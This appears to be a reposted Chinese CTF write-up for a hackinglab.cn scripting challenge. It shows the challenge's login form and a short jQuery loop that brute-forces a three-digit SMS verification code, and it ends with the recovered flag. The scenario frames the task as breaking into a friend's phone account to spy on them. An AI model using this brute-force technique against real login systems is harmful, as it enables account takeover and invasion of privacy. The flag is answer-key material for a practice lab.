2. 程式人生 > >hackinglab.cn指令碼關之十

hackinglab.cn指令碼關之十

阿新 發佈:2019-02-15

題目:

Tips:你是一名黑客,你懷疑你的“(男/女)閨蜜”的出軌了,你要登陸TA手機的網上營業廳檢視詳單,一探究竟! 閨蜜手機號碼:13388886666


writeup:

  1. 開啟題目連結是一個輸入驗證碼提交的題目,點選獲取驗證碼
    手機驗證碼是:驗證碼發到手機上了,你看不到..是3位純數字,開頭不為0

    看來是要暴力破解了。。。
  2. 破解之前要先知道表單的欄位,檢視原始碼
    <html>
    <head>
        <meta http-equiv="content-type" content="text/html;charset=utf-8">
        <script src="../jquery-2.0.3.js"></script>
    </head>
    <body>
        請使用手機簡訊驗證碼登陸
        <br>Tips:你是一名黑客,你懷疑你的“(男/女)閨蜜”的出軌了,你要登陸TA手機的網上營業廳檢視詳單,一探究竟!
        <br>閨蜜手機號碼:13388886666
    	<form action="login.php" method="POST">
            Phone: <input type="text" value="13388886666" name="username" id="username"><br>
            Vcode: <input type="text" value="" name="vcode"><br>
            <a href="#" class="getcode">點選獲取手機驗證碼</a>
            <input type="submit" value="submit" name="Login"><br>
        </form>
    </body>
</html>
<script>
    $(".getcode").click(function(){
    var url="./vcode.php";
        $.post(url,{'getcode':'1','mobi':$("#username").val()},function(data){
            alert("手機驗證碼是:"+data);
	    });
    });
</script>


  3. 可以用工具或指令碼破解,這裡由於數位不多我直接用js寫了個指令碼(網頁中包含了jquery庫,可以利用)
    var getKey=function(phone){//phone指登陸號碼
	var i=100;
	while(i<1000){
		$.post('login.php',{username:phone,vcode:''+i},function(data){
			if(data.indexOf('error')==-1) alert(data);
		});
		i++;
	}
}

  4. 開啟web控制檯貼上上面的程式碼回車,然後執行函式
    你傷心的發現他/她正在跟你的前男/女友勾搭.....於是下決心看看前任除了跟你的(男/女)閨蜜勾搭,是不是還跟別的勾搭..<br>前任的手機號碼是:13399999999

    會彈出這個結果。那麼換上新號碼在執行函式
    key is LKK8*([email protected]@sd

    彈出結果,獲得key。

注意:用的ajax,破解時發的請求多可能會卡但只有一小會兒。

相關推薦

hackinglab.cn指令碼

題目: Tips:你是一名黑客,你懷疑你的“(男/女)閨蜜”的出軌了,你要登陸TA手機的網上營業廳檢視詳單,一探究竟! 閨蜜手機號碼:13388886666 writeup: 開啟題目連結是一個輸入

hackinglab.cn指令碼

題目: 提交說明:提交前14個字元即可過關 writeup: 點選進去後_點選之後怎麼沒反應呢?說好的彈窗呢?__ 是一個連結,點選後確實沒啥反應。。可能原始碼中有提示<html>

hackinglab.cn 注入之一

題目: Tips題目裡有簡單提示. writeup: 第一關應該挺簡單的。 點選題目地址進去,顯示的是一個簡單的登陸介面,還有一個驗證碼。 檢視一下原始碼,發現有一個提示: <!--

java B2B2C電子商務平臺分析------服務網zuul

選擇 col pos ade 流量 如何 ttpClient b2b2c http Zuul是什麽微服務場景下,每一個微服務對外暴露了一組細粒度的服務。客戶端的請求可能會涉及到一串的服務調用,如果將這些微服務都暴露給客戶端,那麽會增加客戶端代碼的復雜度。願意了解源碼的朋友直

Linux初級運維(五)——bash指令碼程式設計函式

一、函式         函式:功能,function  程式碼重用的功能。         結構化程式設計,不能獨立執行,需要呼叫

hackinglab.cn網路安全實驗室基礎

作者:AlcyoneYYXJ 如有錯誤or不同的思路還請給位指正交流&學習 , 第一題 Key在哪裡? 第二題 再加密一次你就得到Key啦~ 第三題 猜猜這是經過了多少次加密 加密後的字串為: Vm0wd2QyUXlVWGxWV0d4V1YwZDR

hackinglab-指令碼11——驗證碼識別

驗證碼識別 題目描述 解題思路 1、開啟連結, 檢視原始碼 2、嘗試了一下,發現驗證碼必須每次驗證,所以就用Pkav HTTP Fuzzer來進行爆破 3、對Pkav HTTP Fuzzer配置 (1)對手機驗證碼進行標記,對驗

hackinglab-指令碼8——微笑一下就能過關了

微笑一下就能過關了 題目描述 解題思路 1、點開題, 檢視原始碼 發現有個原始碼連結,開啟 2、程式碼審計 (1)不可以提交^_^ (2)不可以包含“.”、“%”、“0-9的數字”、“%”、“http”、“https”、“

hackinglab-指令碼14——XSS基礎3檢測與構造

XSS基礎3:檢測與構造 題目描述 解題思路 xss過濾三件套,這道題估計是要過濾<>了,果然不出所料,在前兩題的基礎上,過濾掉<>,使用最常見的轉16進位制繞過,提示錯誤 說明這道題應該是有自己的過濾規則,試了很多次

hackinglab指令碼WP(一)

1.key又又找不到了 burp抓包,在history裡找到key 2.快速口算 正常情況下兩秒內做出來當然不可能,所以跑python,自動獲取算式、計算、提交 # -*- coding: gbk -*- # -*- coding: utf-8

hackinglab 指令碼 writeup

key又又找不到了 先點開通關地址 之後點選這個連結,攔截它的response,可以得到key 快速口算 寫個指令碼就行了。利用正則來提取相關資訊。 import requests import re url = 'http://lab

Vbs指令碼程式設計簡明教程五——響應事件

什麼是事件?在我看來,事件就象我們手機上的鬧鐘,鬧鐘一響,我們就要去做某些特定的事情。或者這樣說,事件就像警鐘,當程式執行時,有特殊的事情發生,就會激發事件,事件本身就是一條訊息,如果你編寫的指令碼要對事件進行處理,就需要一個特殊的過程或者函式來接受和處理事件。那麼這個特殊的

Mysql學習二:JDBC連接數據庫DriverManager方法

url state 種類 delet rom 條件 管理系 ont into JDBC連接數據庫 ?創建一個以JDBC連接數據庫的程序,包括7個步驟: 1、載入JDBC驅動程序: 在連接數據庫之前。首先要載入想要連接的數據庫的驅動到JVM

[Python爬蟲] 五:Selenium +phantomjs根據微信公眾號抓取微信文章

頭部 drive lac 過程 標題 操作 函數 軟件測試 init   借助搜索微信搜索引擎進行抓取   抓取過程   1、首先在搜狗的微信搜索頁面測試一下,這樣能夠讓我們的思路更加清晰        在搜索引擎上使用微信公眾號英文名進行“搜公眾號&r

與其放在電腦裏占內存,還不如拿出來幫助一群小白白html篇

cell pan adding rowspan add 歌曲 作者 ctype lsp <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> &l

與其放在電腦裏占內存,還不如拿出來幫助一群小白白html篇

dcl body window let ctype urn doctype 繼續 document <!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><

轉: 【Java並發編程】八:第五篇中volatile意外問題的正確分析解答(含代碼)

深入 規則 rup lis con method 執行 change .text 轉載請註明出處:http://blog.csdn.net/ns_code/article/details/17382679 在《Java並發編程學習筆記之五:volatile變量修

轉:【Java並發編程】六:深入Java內存模型——happen-before規則及其對DCL的分析(含代碼)

無需 bit 對象引用 說了 final 緩存 機器 通過 round 轉載請註明出處:http://blog.csdn.net/ns_code/article/details/17348313 happen—before規則介紹 Java語言中有一個“先行發生

轉:【Java並發編程】二:線程間通信中notifyAll造成的早期通知問題(含代碼)

data light lan 添加項 article util tool 元素 seconds 轉載請註明出處:http://blog.csdn.net/ns_code/article/details/17229601 如果線程在等待時接到通知,但線程等待的條件

轉:【Java並發編程】九:並發新特性—Executor框架與線程池(含代碼)

接口類 容易 20px 了解 大小 執行c 生命周期 schedule p s Executor框架簡介 在Java 5之後,並發編程引入了一堆新的啟動、調度和管理線程的API。Executor框架便是Java 5中引入的,其內部使用了線程池機制,它在java.